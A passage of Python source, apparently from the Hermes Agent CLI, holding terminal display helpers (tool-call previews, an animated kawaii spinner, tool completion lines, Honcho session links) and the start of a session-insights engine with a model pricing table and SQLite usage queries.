except Exception:
return None
def get_skin_faces(key: str, default: list) -> list:
"""Get spinner face list from active skin, falling back to default."""
skin = _get_skin()
if skin:
faces = skin.get_spinner_list(key)
if faces:
return faces
return default
def get_skin_verbs() -> list:
"""Get thinking verbs from active skin."""
skin = _get_skin()
if skin:
verbs = skin.get_spinner_list("thinking_verbs")
if verbs:
return verbs
return KawaiiSpinner.THINKING_VERBS
def get_skin_tool_prefix() -> str:
"""Get tool output prefix character from active skin."""
skin = _get_skin()
if skin:
return skin.tool_prefix
return ""
# =========================================================================
# Tool preview (one-line summary of a tool call's primary argument)
# =========================================================================
def _oneline(text: str) -> str:
"""Collapse whitespace (including newlines) to single spaces."""
return " ".join(text.split())
def build_tool_preview(tool_name: str, args: dict, max_len: int = 40) -> str:
"""Build a short preview of a tool call's primary argument for display."""
if not args:
return None
primary_args = {
"terminal": "command", "web_search": "query", "web_extract": "urls",
"read_file": "path", "write_file": "path", "patch": "path",
"search_files": "pattern", "browser_navigate": "url",
"browser_click": "ref", "browser_type": "text",
"image_generate": "prompt", "text_to_speech": "text",
"vision_analyze": "question", "mixture_of_agents": "user_prompt",
"skill_view": "name", "skills_list": "category",
"schedule_cronjob": "name",
"execute_code": "code", "delegate_task": "goal",
"clarify": "question", "skill_manage": "name",
}
if tool_name == "process":
action = args.get("action", "")
sid = args.get("session_id", "")
data = args.get("data", "")
timeout_val = args.get("timeout")
parts = [action]
if sid:
parts.append(sid[:16])
if data:
parts.append(f'"{_oneline(data[:20])}"')
if timeout_val and action == "wait":
parts.append(f"{timeout_val}s")
return " ".join(parts) if parts else None
if tool_name == "todo":
todos_arg = args.get("todos")
merge = args.get("merge", False)
if todos_arg is None:
return "reading task list"
elif merge:
return f"updating {len(todos_arg)} task(s)"
else:
return f"planning {len(todos_arg)} task(s)"
if tool_name == "session_search":
query = _oneline(args.get("query", ""))
return f"recall: \"{query[:25]}{'...' if len(query) > 25 else ''}\""
if tool_name == "memory":
action = args.get("action", "")
target = args.get("target", "")
if action == "add":
content = _oneline(args.get("content", ""))
return f"+{target}: \"{content[:25]}{'...' if len(content) > 25 else ''}\""
elif action == "replace":
return f"~{target}: \"{_oneline(args.get('old_text', '')[:20])}\""
elif action == "remove":
return f"-{target}: \"{_oneline(args.get('old_text', '')[:20])}\""
return action
if tool_name == "send_message":
target = args.get("target", "?")
msg = _oneline(args.get("message", ""))
if len(msg) > 20:
msg = msg[:17] + "..."
return f"to {target}: \"{msg}\""
if tool_name.startswith("rl_"):
rl_previews = {
"rl_list_environments": "listing envs",
"rl_select_environment": args.get("name", ""),
"rl_get_current_config": "reading config",
"rl_edit_config": f"{args.get('field', '')}={args.get('value', '')}",
"rl_start_training": "starting",
"rl_check_status": args.get("run_id", "")[:16],
"rl_stop_training": f"stopping {args.get('run_id', '')[:16]}",
"rl_get_results": args.get("run_id", "")[:16],
"rl_list_runs": "listing runs",
"rl_test_inference": f"{args.get('num_steps', 3)} steps",
}
return rl_previews.get(tool_name)
key = primary_args.get(tool_name)
if not key:
for fallback_key in ("query", "text", "command", "path", "name", "prompt", "code", "goal"):
if fallback_key in args:
key = fallback_key
break
if not key or key not in args:
return None
value = args[key]
if isinstance(value, list):
value = value[0] if value else ""
preview = _oneline(str(value))
if not preview:
return None
if len(preview) > max_len:
preview = preview[:max_len - 3] + "..."
return preview
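# Illustrative previews (argument dicts are examples):
#   build_tool_preview("terminal", {"command": "ls -la /tmp"}) -> 'ls -la /tmp'
#   build_tool_preview("memory", {"action": "add", "target": "notes",
#       "content": "ship it"}) -> '+notes: "ship it"'
#   build_tool_preview("unknown_tool", {"query": "x"}) -> 'x' (fallback key)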
# =========================================================================
# KawaiiSpinner
# =========================================================================
class KawaiiSpinner:
"""Animated spinner with kawaii faces for CLI feedback during tool execution."""
SPINNERS = {
'dots': ['⠋', '⠙', '⠹', '⠸', '⠼', '⠴', '⠦', '⠧', '⠇', '⠏'],
'bounce': ['⠁', '⠂', '⠄', '⡀', '⢀', '⠠', '⠐', '⠈'],
'grow': ['▁', '▂', '▃', '▄', '▅', '▆', '▇', '█', '▇', '▆', '▅', '▄', '▃', '▂'],
'arrows': ['←', '↖', '↑', '↗', '→', '↘', '↓', '↙'],
'star': ['', '', '', '', '', '', '', ''],
'moon': ['🌑', '🌒', '🌓', '🌔', '🌕', '🌖', '🌗', '🌘'],
'pulse': ['', '', '', '', '', ''],
'brain': ['🧠', '💭', '💡', '', '💫', '🌟', '💡', '💭'],
'sparkle': ['', '˚', '*', '', '', '', '*', '˚'],
}
KAWAII_WAITING = [
"(。◕‿◕。)", "(◕‿◕✿)", "٩(◕‿◕。)۶", "(✿◠‿◠)", "( ˘▽˘)っ",
"♪(´ε` )", "(◕ᴗ◕✿)", "ヾ(^∇^)", "(≧◡≦)", "(★ω★)",
]
KAWAII_THINKING = [
"(。•́︿•̀。)", "(◔_◔)", "(¬‿¬)", "( •_•)>⌐■-■", "(⌐■_■)",
"(´・_・`)", "◉_◉", "(°ロ°)", "( ˘⌣˘)♡", "ヽ(>∀<☆)☆",
"٩(๑❛ᴗ❛๑)۶", "(⊙_⊙)", "(¬_¬)", "( ͡° ͜ʖ ͡°)", "ಠ_ಠ",
]
THINKING_VERBS = [
"pondering", "contemplating", "musing", "cogitating", "ruminating",
"deliberating", "mulling", "reflecting", "processing", "reasoning",
"analyzing", "computing", "synthesizing", "formulating", "brainstorming",
]
def __init__(self, message: str = "", spinner_type: str = 'dots'):
self.message = message
self.spinner_frames = self.SPINNERS.get(spinner_type, self.SPINNERS['dots'])
self.running = False
self.thread = None
self.frame_idx = 0
self.start_time = None
self.last_line_len = 0
self._last_flush_time = 0.0 # Rate-limit flushes for patch_stdout compat
# Capture stdout NOW, before any redirect_stdout(devnull) from
# child agents can replace sys.stdout with a black hole.
self._out = sys.stdout
def _write(self, text: str, end: str = '\n', flush: bool = False):
"""Write to the stdout captured at spinner creation time."""
try:
self._out.write(text + end)
if flush:
self._out.flush()
except (ValueError, OSError):
pass
def _animate(self):
# Cache skin wings at start (avoid per-frame imports)
skin = _get_skin()
wings = skin.get_spinner_wings() if skin else []
while self.running:
if os.getenv("HERMES_SPINNER_PAUSE"):
time.sleep(0.1)
continue
frame = self.spinner_frames[self.frame_idx % len(self.spinner_frames)]
elapsed = time.time() - self.start_time
if wings:
left, right = wings[self.frame_idx % len(wings)]
line = f" {left} {frame} {self.message} {right} ({elapsed:.1f}s)"
else:
line = f" {frame} {self.message} ({elapsed:.1f}s)"
pad = max(self.last_line_len - len(line), 0)
# Rate-limit flush() calls to avoid spinner spam under
# prompt_toolkit's patch_stdout. Each flush() pushes a queue
# item that may trigger a separate run_in_terminal() call; if
# items are processed one-at-a-time the \r overwrite is lost
# and every frame appears on its own line. By flushing at
# most every 0.4s we guarantee multiple \r-frames are batched
# into a single write, so the terminal collapses them correctly.
now = time.time()
should_flush = (now - self._last_flush_time) >= 0.4
self._write(f"\r{line}{' ' * pad}", end='', flush=should_flush)
if should_flush:
self._last_flush_time = now
self.last_line_len = len(line)
self.frame_idx += 1
time.sleep(0.12)
def start(self):
if self.running:
return
self.running = True
self.start_time = time.time()
self.thread = threading.Thread(target=self._animate, daemon=True)
self.thread.start()
def update_text(self, new_message: str):
self.message = new_message
def print_above(self, text: str):
"""Print a line above the spinner without disrupting animation.
Clears the current spinner line, prints the text, and lets the
next animation tick redraw the spinner on the line below.
Thread-safe: uses the captured stdout reference (self._out).
Works inside redirect_stdout(devnull) because _write bypasses
sys.stdout and writes to the stdout captured at spinner creation.
"""
if not self.running:
self._write(f" {text}", flush=True)
return
# Clear spinner line with spaces (not \033[K) to avoid garbled escape
# codes when prompt_toolkit's patch_stdout is active — same approach
# as stop(). Then print text; spinner redraws on next tick.
blanks = ' ' * max(self.last_line_len + 5, 40)
self._write(f"\r{blanks}\r {text}", flush=True)
def stop(self, final_message: str = None):
self.running = False
if self.thread:
self.thread.join(timeout=0.5)
# Clear the spinner line with spaces instead of \033[K to avoid
# garbled escape codes when prompt_toolkit's patch_stdout is active.
blanks = ' ' * max(self.last_line_len + 5, 40)
self._write(f"\r{blanks}\r", end='', flush=True)
if final_message:
self._write(f" {final_message}", flush=True)
def __enter__(self):
self.start()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.stop()
return False
# =========================================================================
# Kawaii face arrays (used by AIAgent._execute_tool_calls for spinner text)
# =========================================================================
KAWAII_SEARCH = [
"♪(´ε` )", "(。◕‿◕。)", "ヾ(^∇^)", "(◕ᴗ◕✿)", "( ˘▽˘)っ",
"٩(◕‿◕。)۶", "(✿◠‿◠)", "♪~(´ε` )", "(ノ´ヮ`)*:・゚✧", "(◎o◎)",
]
KAWAII_READ = [
"φ(゜▽゜*)♪", "( ˘▽˘)っ", "(⌐■_■)", "٩(。•́‿•̀。)۶", "(◕‿◕✿)",
"ヾ(@⌒ー⌒@)", "(✧ω✧)", "♪(๑ᴖ◡ᴖ๑)♪", "(≧◡≦)", "( ´ ▽ ` )",
]
KAWAII_TERMINAL = [
"ヽ(>∀<☆)", "(ノ°∀°)", "٩(^ᴗ^)۶", "ヾ(⌐■_■)ノ♪", "(•̀ᴗ•́)و",
"┗(0)┓", "(`・ω・´)", "( ̄▽ ̄)", "(ง •̀_•́)ง", "ヽ(´▽`)/",
]
KAWAII_BROWSER = [
"(ノ°∀°)", "(☞゚ヮ゚)☞", "( ͡° ͜ʖ ͡°)", "┌( ಠ_ಠ)┘", "(⊙_⊙)",
"ヾ(•ω•`)o", "( ̄ω ̄)", "( ˇωˇ )", "(ᵔᴥᵔ)", "(◎o◎)",
]
KAWAII_CREATE = [
"✧*。٩(ˊᗜˋ*)و✧", "(ノ◕ヮ◕)ノ*:・゚✧", "ヽ(>∀<☆)", "٩(♡ε♡)۶", "(◕‿◕)♡",
"✿◕ ‿ ◕✿", "(*≧▽≦)", "ヾ(-)", "(☆▽☆)", "°˖✧◝(⁰▿⁰)◜✧˖°",
]
KAWAII_SKILL = [
"ヾ(@⌒ー⌒@)", "(๑˃ᴗ˂)ﻭ", "٩(◕‿◕。)۶", "(✿╹◡╹)", "ヽ(・∀・)",
"(ノ´ヮ`)*:・゚✧", "♪(๑ᴖ◡ᴖ๑)♪", "(◠‿◠)", "٩(ˊᗜˋ*)و", "(^▽^)",
"ヾ(^∇^)", "(★ω★)/", "٩(。•́‿•̀。)۶", "(◕ᴗ◕✿)", "(◎o◎)",
"(✧ω✧)", "ヽ(>∀<☆)", "( ˘▽˘)っ", "(≧◡≦) ♡", "ヾ( ̄▽ ̄)",
]
KAWAII_THINK = [
"(っ°Д°;)っ", "(;′⌒`)", "(・_・ヾ", "( ´_ゝ`)", "( ̄ヘ ̄)",
"(。-`ω´-)", "( ˘︹˘ )", "(¬_¬)", "ヽ(ー_ー )", "(一_一)",
]
KAWAII_GENERIC = [
"♪(´ε` )", "(◕‿◕✿)", "ヾ(^∇^)", "٩(◕‿◕。)۶", "(✿◠‿◠)",
"(ノ´ヮ`)*:・゚✧", "ヽ(>∀<☆)", "(☆▽☆)", "( ˘▽˘)っ", "(≧◡≦)",
]
# =========================================================================
# Cute tool message (completion line that replaces the spinner)
# =========================================================================
def _detect_tool_failure(tool_name: str, result: str | None) -> tuple[bool, str]:
"""Inspect a tool result string for signs of failure.
Returns ``(is_failure, suffix)`` where *suffix* is an informational tag
like ``" [exit 1]"`` for terminal failures, or ``" [error]"`` for generic
failures. On success, returns ``(False, "")``.
"""
if result is None:
return False, ""
if tool_name == "terminal":
try:
data = json.loads(result)
exit_code = data.get("exit_code")
if exit_code is not None and exit_code != 0:
return True, f" [exit {exit_code}]"
except (json.JSONDecodeError, TypeError, AttributeError):
logger.debug("Could not parse terminal result as JSON for exit code check")
return False, ""
# Memory-specific: distinguish "full" from real errors
if tool_name == "memory":
try:
data = json.loads(result)
if data.get("success") is False and "exceed the limit" in data.get("error", ""):
return True, " [full]"
except (json.JSONDecodeError, TypeError, AttributeError):
logger.debug("Could not parse memory result as JSON for capacity check")
# Generic heuristic for non-terminal tools
lower = result[:500].lower()
if '"error"' in lower or '"failed"' in lower or result.startswith("Error"):
return True, " [error]"
return False, ""
def get_cute_tool_message(
tool_name: str, args: dict, duration: float, result: str | None = None,
) -> str:
"""Generate a formatted tool completion line for CLI quiet mode.
Format: ``| {emoji} {verb:9} {detail} {duration}``
When *result* is provided the line is checked for failure indicators.
Failed tool calls get a red prefix and an informational suffix.
"""
dur = f"{duration:.1f}s"
is_failure, failure_suffix = _detect_tool_failure(tool_name, result)
skin_prefix = get_skin_tool_prefix()
def _trunc(s, n=40):
s = str(s)
return (s[:n-3] + "...") if len(s) > n else s
def _path(p, n=35):
p = str(p)
return ("..." + p[-(n-3):]) if len(p) > n else p
def _wrap(line: str) -> str:
"""Apply skin tool prefix and failure suffix."""
if skin_prefix != "":
line = line.replace("", skin_prefix, 1)
if not is_failure:
return line
return f"{line}{failure_suffix}"
if tool_name == "web_search":
return _wrap(f"┊ 🔍 search {_trunc(args.get('query', ''), 42)} {dur}")
if tool_name == "web_extract":
urls = args.get("urls", [])
if urls:
url = urls[0] if isinstance(urls, list) else str(urls)
domain = url.replace("https://", "").replace("http://", "").split("/")[0]
extra = f" +{len(urls)-1}" if len(urls) > 1 else ""
return _wrap(f"┊ 📄 fetch {_trunc(domain, 35)}{extra} {dur}")
return _wrap(f"┊ 📄 fetch pages {dur}")
if tool_name == "web_crawl":
url = args.get("url", "")
domain = url.replace("https://", "").replace("http://", "").split("/")[0]
return _wrap(f"┊ 🕸️ crawl {_trunc(domain, 35)} {dur}")
if tool_name == "terminal":
return _wrap(f"┊ 💻 $ {_trunc(args.get('command', ''), 42)} {dur}")
if tool_name == "process":
action = args.get("action", "?")
sid = args.get("session_id", "")[:12]
labels = {"list": "ls processes", "poll": f"poll {sid}", "log": f"log {sid}",
"wait": f"wait {sid}", "kill": f"kill {sid}", "write": f"write {sid}", "submit": f"submit {sid}"}
return _wrap(f"┊ ⚙️ proc {labels.get(action, f'{action} {sid}')} {dur}")
if tool_name == "read_file":
return _wrap(f"┊ 📖 read {_path(args.get('path', ''))} {dur}")
if tool_name == "write_file":
return _wrap(f"┊ ✍️ write {_path(args.get('path', ''))} {dur}")
if tool_name == "patch":
return _wrap(f"┊ 🔧 patch {_path(args.get('path', ''))} {dur}")
if tool_name == "search_files":
pattern = _trunc(args.get("pattern", ""), 35)
target = args.get("target", "content")
verb = "find" if target == "files" else "grep"
return _wrap(f"┊ 🔎 {verb:9} {pattern} {dur}")
if tool_name == "browser_navigate":
url = args.get("url", "")
domain = url.replace("https://", "").replace("http://", "").split("/")[0]
return _wrap(f"┊ 🌐 navigate {_trunc(domain, 35)} {dur}")
if tool_name == "browser_snapshot":
mode = "full" if args.get("full") else "compact"
return _wrap(f"┊ 📸 snapshot {mode} {dur}")
if tool_name == "browser_click":
return _wrap(f"┊ 👆 click {args.get('ref', '?')} {dur}")
if tool_name == "browser_type":
return _wrap(f"┊ ⌨️ type \"{_trunc(args.get('text', ''), 30)}\" {dur}")
if tool_name == "browser_scroll":
d = args.get("direction", "down")
arrow = {"down": "", "up": "", "right": "", "left": ""}.get(d, "")
return _wrap(f"{arrow} scroll {d} {dur}")
if tool_name == "browser_back":
return _wrap(f"┊ ◀️ back {dur}")
if tool_name == "browser_press":
return _wrap(f"┊ ⌨️ press {args.get('key', '?')} {dur}")
if tool_name == "browser_close":
return _wrap(f"┊ 🚪 close browser {dur}")
if tool_name == "browser_get_images":
return _wrap(f"┊ 🖼️ images extracting {dur}")
if tool_name == "browser_vision":
return _wrap(f"┊ 👁️ vision analyzing page {dur}")
if tool_name == "todo":
todos_arg = args.get("todos")
merge = args.get("merge", False)
if todos_arg is None:
return _wrap(f"┊ 📋 plan reading tasks {dur}")
elif merge:
return _wrap(f"┊ 📋 plan update {len(todos_arg)} task(s) {dur}")
else:
return _wrap(f"┊ 📋 plan {len(todos_arg)} task(s) {dur}")
if tool_name == "session_search":
return _wrap(f"┊ 🔍 recall \"{_trunc(args.get('query', ''), 35)}\" {dur}")
if tool_name == "memory":
action = args.get("action", "?")
target = args.get("target", "")
if action == "add":
return _wrap(f"┊ 🧠 memory +{target}: \"{_trunc(args.get('content', ''), 30)}\" {dur}")
elif action == "replace":
return _wrap(f"┊ 🧠 memory ~{target}: \"{_trunc(args.get('old_text', ''), 20)}\" {dur}")
elif action == "remove":
return _wrap(f"┊ 🧠 memory -{target}: \"{_trunc(args.get('old_text', ''), 20)}\" {dur}")
return _wrap(f"┊ 🧠 memory {action} {dur}")
if tool_name == "skills_list":
return _wrap(f"┊ 📚 skills list {args.get('category', 'all')} {dur}")
if tool_name == "skill_view":
return _wrap(f"┊ 📚 skill {_trunc(args.get('name', ''), 30)} {dur}")
if tool_name == "image_generate":
return _wrap(f"┊ 🎨 create {_trunc(args.get('prompt', ''), 35)} {dur}")
if tool_name == "text_to_speech":
return _wrap(f"┊ 🔊 speak {_trunc(args.get('text', ''), 30)} {dur}")
if tool_name == "vision_analyze":
return _wrap(f"┊ 👁️ vision {_trunc(args.get('question', ''), 30)} {dur}")
if tool_name == "mixture_of_agents":
return _wrap(f"┊ 🧠 reason {_trunc(args.get('user_prompt', ''), 30)} {dur}")
if tool_name == "send_message":
return _wrap(f"┊ 📨 send {args.get('target', '?')}: \"{_trunc(args.get('message', ''), 25)}\" {dur}")
if tool_name == "schedule_cronjob":
return _wrap(f"┊ ⏰ schedule {_trunc(args.get('name', args.get('prompt', 'task')), 30)} {dur}")
if tool_name == "list_cronjobs":
return _wrap(f"┊ ⏰ jobs listing {dur}")
if tool_name == "remove_cronjob":
return _wrap(f"┊ ⏰ remove job {args.get('job_id', '?')} {dur}")
if tool_name.startswith("rl_"):
rl = {
"rl_list_environments": "list envs", "rl_select_environment": f"select {args.get('name', '')}",
"rl_get_current_config": "get config", "rl_edit_config": f"set {args.get('field', '?')}",
"rl_start_training": "start training", "rl_check_status": f"status {args.get('run_id', '?')[:12]}",
"rl_stop_training": f"stop {args.get('run_id', '?')[:12]}", "rl_get_results": f"results {args.get('run_id', '?')[:12]}",
"rl_list_runs": "list runs", "rl_test_inference": "test inference",
}
return _wrap(f"┊ 🧪 rl {rl.get(tool_name, tool_name.replace('rl_', ''))} {dur}")
if tool_name == "execute_code":
code = args.get("code", "")
first_line = code.strip().split("\n")[0] if code.strip() else ""
return _wrap(f"┊ 🐍 exec {_trunc(first_line, 35)} {dur}")
if tool_name == "delegate_task":
tasks = args.get("tasks")
if tasks and isinstance(tasks, list):
return _wrap(f"┊ 🔀 delegate {len(tasks)} parallel tasks {dur}")
return _wrap(f"┊ 🔀 delegate {_trunc(args.get('goal', ''), 35)} {dur}")
preview = build_tool_preview(tool_name, args) or ""
return _wrap(f"┊ ⚡ {tool_name[:9]:9} {_trunc(preview, 35)} {dur}")
# =========================================================================
# Honcho session line (one-liner with clickable OSC 8 hyperlink)
# =========================================================================
_DIM = "\033[2m"
_SKY_BLUE = "\033[38;5;117m"
_ANSI_RESET = "\033[0m"
def honcho_session_url(workspace: str, session_name: str) -> str:
"""Build a Honcho app URL for a session."""
from urllib.parse import quote
return (
f"https://app.honcho.dev/explore"
f"?workspace={quote(workspace, safe='')}"
f"&view=sessions"
f"&session={quote(session_name, safe='')}"
)
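# Worked example (illustrative values) — both parameters are percent-encoded:
#   honcho_session_url("my ws", "run/1")
#   -> "https://app.honcho.dev/explore?workspace=my%20ws&view=sessions&session=run%2F1"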
def _osc8_link(url: str, text: str) -> str:
"""OSC 8 terminal hyperlink (clickable in iTerm2, Ghostty, WezTerm, etc.)."""
return f"\033]8;;{url}\033\\{text}\033]8;;\033\\"
def honcho_session_line(workspace: str, session_name: str) -> str:
"""One-line session indicator: `Honcho session: <clickable name>`."""
url = honcho_session_url(workspace, session_name)
linked_name = _osc8_link(url, f"{_SKY_BLUE}{session_name}{_ANSI_RESET}")
return f"{_DIM}Honcho session:{_ANSI_RESET} {linked_name}"
def write_tty(text: str) -> None:
"""Write directly to /dev/tty, bypassing stdout capture."""
try:
fd = os.open("/dev/tty", os.O_WRONLY)
os.write(fd, text.encode("utf-8"))
os.close(fd)
except OSError:
sys.stdout.write(text)
sys.stdout.flush()

818
agent/insights.py Normal file

@@ -0,0 +1,818 @@
"""
Session Insights Engine for Hermes Agent.
Analyzes historical session data from the SQLite state database to produce
comprehensive usage insights — token consumption, cost estimates, tool usage
patterns, activity trends, model/platform breakdowns, and session metrics.
Inspired by Claude Code's /insights command, adapted for Hermes Agent's
multi-platform architecture with additional cost estimation and platform
breakdown capabilities.
Usage:
from agent.insights import InsightsEngine
engine = InsightsEngine(db)
report = engine.generate(days=30)
print(engine.format_terminal(report))
"""
import json
import time
from collections import Counter, defaultdict
from datetime import datetime
from typing import Any, Dict, List, Optional
# =========================================================================
# Model pricing (USD per million tokens) — approximate as of early 2026
# =========================================================================
MODEL_PRICING = {
# OpenAI
"gpt-4o": {"input": 2.50, "output": 10.00},
"gpt-4o-mini": {"input": 0.15, "output": 0.60},
"gpt-4.1": {"input": 2.00, "output": 8.00},
"gpt-4.1-mini": {"input": 0.40, "output": 1.60},
"gpt-4.1-nano": {"input": 0.10, "output": 0.40},
"gpt-4.5-preview": {"input": 75.00, "output": 150.00},
"gpt-5": {"input": 10.00, "output": 30.00},
"gpt-5.4": {"input": 10.00, "output": 30.00},
"o3": {"input": 10.00, "output": 40.00},
"o3-mini": {"input": 1.10, "output": 4.40},
"o4-mini": {"input": 1.10, "output": 4.40},
# Anthropic
"claude-opus-4-20250514": {"input": 15.00, "output": 75.00},
"claude-sonnet-4-20250514": {"input": 3.00, "output": 15.00},
"claude-3-5-sonnet-20241022": {"input": 3.00, "output": 15.00},
"claude-3-5-haiku-20241022": {"input": 0.80, "output": 4.00},
"claude-3-opus-20240229": {"input": 15.00, "output": 75.00},
"claude-3-haiku-20240307": {"input": 0.25, "output": 1.25},
# DeepSeek
"deepseek-chat": {"input": 0.14, "output": 0.28},
"deepseek-reasoner": {"input": 0.55, "output": 2.19},
# Google
"gemini-2.5-pro": {"input": 1.25, "output": 10.00},
"gemini-2.5-flash": {"input": 0.15, "output": 0.60},
"gemini-2.0-flash": {"input": 0.10, "output": 0.40},
# Meta (via providers)
"llama-4-maverick": {"input": 0.50, "output": 0.70},
"llama-4-scout": {"input": 0.20, "output": 0.30},
# Z.AI / GLM (direct provider — pricing not published externally, treat as local)
"glm-5": {"input": 0.0, "output": 0.0},
"glm-4.7": {"input": 0.0, "output": 0.0},
"glm-4.5": {"input": 0.0, "output": 0.0},
"glm-4.5-flash": {"input": 0.0, "output": 0.0},
# Kimi / Moonshot (direct provider — pricing not published externally, treat as local)
"kimi-k2.5": {"input": 0.0, "output": 0.0},
"kimi-k2-thinking": {"input": 0.0, "output": 0.0},
"kimi-k2-turbo-preview": {"input": 0.0, "output": 0.0},
"kimi-k2-0905-preview": {"input": 0.0, "output": 0.0},
# MiniMax (direct provider — pricing not published externally, treat as local)
"MiniMax-M2.5": {"input": 0.0, "output": 0.0},
"MiniMax-M2.5-highspeed": {"input": 0.0, "output": 0.0},
"MiniMax-M2.1": {"input": 0.0, "output": 0.0},
}
# Fallback: unknown/custom models get zero cost (we can't assume pricing
# for self-hosted models, custom OAI endpoints, local inference, etc.)
_DEFAULT_PRICING = {"input": 0.0, "output": 0.0}
def _has_known_pricing(model_name: str) -> bool:
"""Check if a model has known pricing (vs unknown/custom endpoint)."""
return _get_pricing(model_name) is not _DEFAULT_PRICING
def _get_pricing(model_name: str) -> Dict[str, float]:
"""Look up pricing for a model. Uses fuzzy matching on model name.
Returns _DEFAULT_PRICING (zero cost) for unknown/custom models —
we can't assume costs for self-hosted endpoints, local inference, etc.
"""
if not model_name:
return _DEFAULT_PRICING
# Strip provider prefix (e.g., "anthropic/claude-..." -> "claude-...")
bare = model_name.split("/")[-1].lower()
# Exact match first
if bare in MODEL_PRICING:
return MODEL_PRICING[bare]
# Fuzzy prefix match — prefer the LONGEST matching key to avoid
# e.g. "gpt-4o" matching before "gpt-4o-mini" for "gpt-4o-mini-2024-07-18"
best_match = None
best_len = 0
for key, price in MODEL_PRICING.items():
if bare.startswith(key) and len(key) > best_len:
best_match = price
best_len = len(key)
if best_match:
return best_match
# Keyword heuristics (checked in most-specific-first order)
if "opus" in bare:
return {"input": 15.00, "output": 75.00}
if "sonnet" in bare:
return {"input": 3.00, "output": 15.00}
if "haiku" in bare:
return {"input": 0.80, "output": 4.00}
if "gpt-4o-mini" in bare:
return {"input": 0.15, "output": 0.60}
if "gpt-4o" in bare:
return {"input": 2.50, "output": 10.00}
if "gpt-5" in bare:
return {"input": 10.00, "output": 30.00}
if "deepseek" in bare:
return {"input": 0.14, "output": 0.28}
if "gemini" in bare:
return {"input": 0.15, "output": 0.60}
return _DEFAULT_PRICING
def _estimate_cost(model: str, input_tokens: int, output_tokens: int) -> float:
"""Estimate the USD cost for a given model and token counts."""
pricing = _get_pricing(model)
return (input_tokens * pricing["input"] + output_tokens * pricing["output"]) / 1_000_000
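# Worked example (illustrative): "openai/gpt-4o-mini-2024-07-18" strips to
# "gpt-4o-mini-2024-07-18"; both "gpt-4o" and "gpt-4o-mini" prefix-match and
# the longer key wins ($0.15/$0.60 per Mtok), so 1,000,000 input + 50,000
# output tokens cost (1_000_000 * 0.15 + 50_000 * 0.60) / 1_000_000 = $0.18.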
def _format_duration(seconds: float) -> str:
"""Format seconds into a human-readable duration string."""
if seconds < 60:
return f"{seconds:.0f}s"
minutes = seconds / 60
if minutes < 60:
return f"{minutes:.0f}m"
hours = minutes / 60
if hours < 24:
remaining_min = int(minutes % 60)
return f"{int(hours)}h {remaining_min}m" if remaining_min else f"{int(hours)}h"
days = hours / 24
return f"{days:.1f}d"
def _bar_chart(values: List[int], max_width: int = 20) -> List[str]:
"""Create simple horizontal bar chart strings from values."""
peak = max(values) if values else 1
if peak == 0:
return ["" for _ in values]
return ["" * max(1, int(v / peak * max_width)) if v > 0 else "" for v in values]
class InsightsEngine:
"""
Analyzes session history and produces usage insights.
Works directly with a SessionDB instance (or raw sqlite3 connection)
to query session and message data.
"""
def __init__(self, db):
"""
Initialize with a SessionDB instance.
Args:
db: A SessionDB instance (from hermes_state.py)
"""
self.db = db
self._conn = db._conn
def generate(self, days: int = 30, source: Optional[str] = None) -> Dict[str, Any]:
"""
Generate a complete insights report.
Args:
days: Number of days to look back (default: 30)
source: Optional filter by source platform
Returns:
Dict with all computed insights
"""
cutoff = time.time() - (days * 86400)
# Gather raw data
sessions = self._get_sessions(cutoff, source)
tool_usage = self._get_tool_usage(cutoff, source)
message_stats = self._get_message_stats(cutoff, source)
if not sessions:
return {
"days": days,
"source_filter": source,
"empty": True,
"overview": {},
"models": [],
"platforms": [],
"tools": [],
"activity": {},
"top_sessions": [],
}
# Compute insights
overview = self._compute_overview(sessions, message_stats)
models = self._compute_model_breakdown(sessions)
platforms = self._compute_platform_breakdown(sessions)
tools = self._compute_tool_breakdown(tool_usage)
activity = self._compute_activity_patterns(sessions)
top_sessions = self._compute_top_sessions(sessions)
return {
"days": days,
"source_filter": source,
"empty": False,
"generated_at": time.time(),
"overview": overview,
"models": models,
"platforms": platforms,
"tools": tools,
"activity": activity,
"top_sessions": top_sessions,
}
# =========================================================================
# Data gathering (SQL queries)
# =========================================================================
# Columns we actually need (skip system_prompt, model_config blobs)
_SESSION_COLS = ("id, source, model, started_at, ended_at, "
"message_count, tool_call_count, input_tokens, output_tokens")
def _get_sessions(self, cutoff: float, source: Optional[str] = None) -> List[Dict]:
"""Fetch sessions within the time window."""
if source:
cursor = self._conn.execute(
f"""SELECT {self._SESSION_COLS} FROM sessions
WHERE started_at >= ? AND source = ?
ORDER BY started_at DESC""",
(cutoff, source),
)
else:
cursor = self._conn.execute(
f"""SELECT {self._SESSION_COLS} FROM sessions
WHERE started_at >= ?
ORDER BY started_at DESC""",
(cutoff,),
)
return [dict(row) for row in cursor.fetchall()]
def _get_tool_usage(self, cutoff: float, source: Optional[str] = None) -> List[Dict]:
"""Get tool call counts from messages.
Uses two sources:
1. tool_name column on 'tool' role messages (set by gateway)
2. tool_calls JSON on 'assistant' role messages (covers CLI where
tool_name is not populated on tool responses)
"""
tool_counts = Counter()
# Source 1: explicit tool_name on tool response messages
if source:
cursor = self._conn.execute(
"""SELECT m.tool_name, COUNT(*) as count
FROM messages m
JOIN sessions s ON s.id = m.session_id
WHERE s.started_at >= ? AND s.source = ?
AND m.role = 'tool' AND m.tool_name IS NOT NULL
GROUP BY m.tool_name
ORDER BY count DESC""",
(cutoff, source),
)
else:
cursor = self._conn.execute(
"""SELECT m.tool_name, COUNT(*) as count
FROM messages m
JOIN sessions s ON s.id = m.session_id
WHERE s.started_at >= ?
AND m.role = 'tool' AND m.tool_name IS NOT NULL
GROUP BY m.tool_name
ORDER BY count DESC""",
(cutoff,),
)
for row in cursor.fetchall():
tool_counts[row["tool_name"]] += row["count"]
# Source 2: extract from tool_calls JSON on assistant messages
# (covers CLI sessions where tool_name is NULL on tool responses)
if source:
cursor2 = self._conn.execute(
"""SELECT m.tool_calls
FROM messages m
JOIN sessions s ON s.id = m.session_id
WHERE s.started_at >= ? AND s.source = ?
AND m.role = 'assistant' AND m.tool_calls IS NOT NULL""",
(cutoff, source),
)
else:
cursor2 = self._conn.execute(
"""SELECT m.tool_calls
FROM messages m
JOIN sessions s ON s.id = m.session_id
WHERE s.started_at >= ?
AND m.role = 'assistant' AND m.tool_calls IS NOT NULL""",
(cutoff,),
)
tool_calls_counts = Counter()
for row in cursor2.fetchall():
try:
calls = row["tool_calls"]
if isinstance(calls, str):
calls = json.loads(calls)
if isinstance(calls, list):
for call in calls:
func = call.get("function", {}) if isinstance(call, dict) else {}
name = func.get("name")
if name:
tool_calls_counts[name] += 1
